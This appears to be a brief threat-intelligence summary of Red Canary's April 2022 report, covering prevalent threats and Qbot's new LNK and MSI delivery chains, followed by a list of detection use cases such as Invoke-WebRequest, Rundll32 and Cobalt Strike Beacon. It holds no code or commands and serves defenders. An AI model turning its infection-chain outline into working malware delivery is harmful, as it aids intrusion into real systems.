Red Canary Intelligence Insights

Industry: N/A | Level: Tactical | Source: Red Canary

Red Canary's, monthly Intelligence Insights reports the most prevalent threats for April 2022 were Impacket and Mimikatz, retaining their top 2 positions respectively as the most observed security threats. Notable rises in threat activity came from Gootloader, Qbot, Socgholish, and Raspberry Robin. Raspberry Robin, analyzed by Red Canary, is a "Worm spread by external drives that leverages Windows Installer to download a malicious DLL." New infection vectors for Qbot have been observed using LNK files and MSI packages. The LNK file infection chain begins with delivery through a compressed zip file, the LNK file when executed by the victim runs a PowerShell command to download and execute the Qbot DLL. MSI Packages were identified to be delivered to target victims in place of Microsoft Office Macros. Activity following QBot delivery has involved reconnaissance activity with Bloodhound and Cobalt Strike execution.

Anvilogic Scenario:

• Qakbot/Qbot Zip/LNK/MSI File Delivery to Recon or CS Activity

Anvilogic Use Cases:

• Compressed File Execution
• Symbolic OR Hard File Link Created
• MSIExec Install MSI File
• Invoke-WebRequest Command
• Rundll32 Command Line
• SharpHound Enumeration
• Cobalt Strike Beacon